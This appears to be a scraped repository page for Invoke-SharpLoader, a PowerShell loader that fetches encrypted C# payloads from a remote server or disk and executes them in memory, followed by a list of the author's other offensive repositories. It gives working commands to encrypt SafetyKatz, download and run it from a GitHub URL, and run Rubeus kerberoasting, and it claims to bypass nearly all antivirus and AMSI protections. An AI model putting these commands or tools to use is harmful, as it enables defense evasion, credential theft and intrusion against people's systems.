S3cur3Th1sSh1t/Invoke-SharpLoader

Stars
333
Rank 121,826 (Top 3 %)
Language
PowerShell
Created about 4 years ago
Updated about 3 years ago

S3cur3Th1sSh1t/Invoke-SharpLoader

S3cur3Th1sSh1t

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Invoke-SharpLoader

Load encrypted and compressed C# Code from a remote Webserver or from a local file straight to memory and execute it there.

Two scripts are used here. Invoke-SharpEncrypt can be used to encrypt existing C# files. To do this, the following example command can be used.

Encrypt C# file:

Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc

Only full paths to the file are accepted at this point. The encrypted files generated by Invoke-SharpEncrypt can then be hosted on a web server on the Internet or stored on the target system on disk. Invoke-SharpLoader can be used to decrypt and execute the files in memory. Two examples demonstrate how to load a file from a remote webserver or from disk.

Load from URL:

Invoke-SharpLoader -location https://raw.githubusercontent.com/S3cur3Th1sSh1t/Invoke-SharpLoader/master/EncryptedCSharp/SafetyKatz.enc -password S3cur3Th1sSh1t -noArgs

Load from DISK:

Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"

This project was heavily inspired by Cn33liz p0wnedLoader repo here https://github.com/Cn33liz/p0wnedLoader. By encrypting own executables with a custom password and hosting them somewhere on the internet nearly all local and Proxy AV-Protections and AMSI can be bypassed. :-)

WinPwn

Automation for internal Windows Penetrationtest / AD-Security

Pentest-Tools

Amsi-Bypass-Powershell

This repo contains some Amsi Bypass methods i found on different Blog Posts.

PowerSharpPack

OffensiveVBA

This repo covers some code execution and AV Evasion methods for Macros in Office documents

Creds

Some usefull Scripts and Executables for Pentest & Forensics

MultiPotato

SharpImpersonation

A User Impersonation tool - via Token or Shellcode injection

Caro-Kann

Encrypted shellcode Injection to avoid Kernel triggered memory scans

Ruy-Lopez

SharpNamedPipePTH

Pass the Hash to a named pipe for token Impersonation

Nim-RunPE

A Nim implementation of reflective PE-Loading from memory

NimGetSyscallStub

Get fresh Syscalls from a fresh ntdll.dll copy

SharpVeeamDecryptor

Decrypt Veeam database passwords

NamedPipePTH

Pass the Hash to a named pipe for token Impersonation

SyscallAmsiScanBufferBypass

AmsiScanBufferBypass using D/Invoke

Nim_DInvoke

D/Invoke implementation in Nim

Excel-Phish

Phish password protected Excel-Files

Sharp-HackBrowserData

C# binary with embeded golang hack-browser-data

Get-System-Techniques

NimShellcodeFluctuation

ShellcodeFluctuation PoC ported to Nim

RDPThiefInject

RDPThief donut shellcode inject into mstsc

Invoke-Sharpcradle

Load C# Code straight to memory

Nim_CBT_Shellcode

CallBack-Techniques for Shellcode execution ported to Nim

LDAP-Signing-Scanner

A little scanner to check the LDAP Signing state

BitwardenDecryptBrute

Wordlist attacks on Bitwarden data.json files

SharpOxidResolver

IOXIDResolver from AirBus Security/PingCastle

SharpPolarBear

Privesc through import of Sheduled tasks + Hardlinks - CVE-2019-1069

SharpByeBear

AppXSVC Service race condition - privilege escalation

S3cur3Th1sSh1t

TeamViewerDecrypt

SharpLigolo

C# wrapper for ligolo

Invoke-WMI-Information

Straight forward script for WMI information gathering (local or remote)

EmpEISDecrypt

Decrypt Matrix42 Empirum /EIS Passwords

NimWinstaEveryoneAccess

darkamour_clone

WinFor

Powershell script to execute different forensic Powershell functions / tools on a compromised host

ssdp-poisoning

MimiMisc

SSJI---JSGen

Just a copy from here: https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py

Hosts-File---AD-Tracking-Blocker

Hosts File for Blocking Advertising & Tracking Domains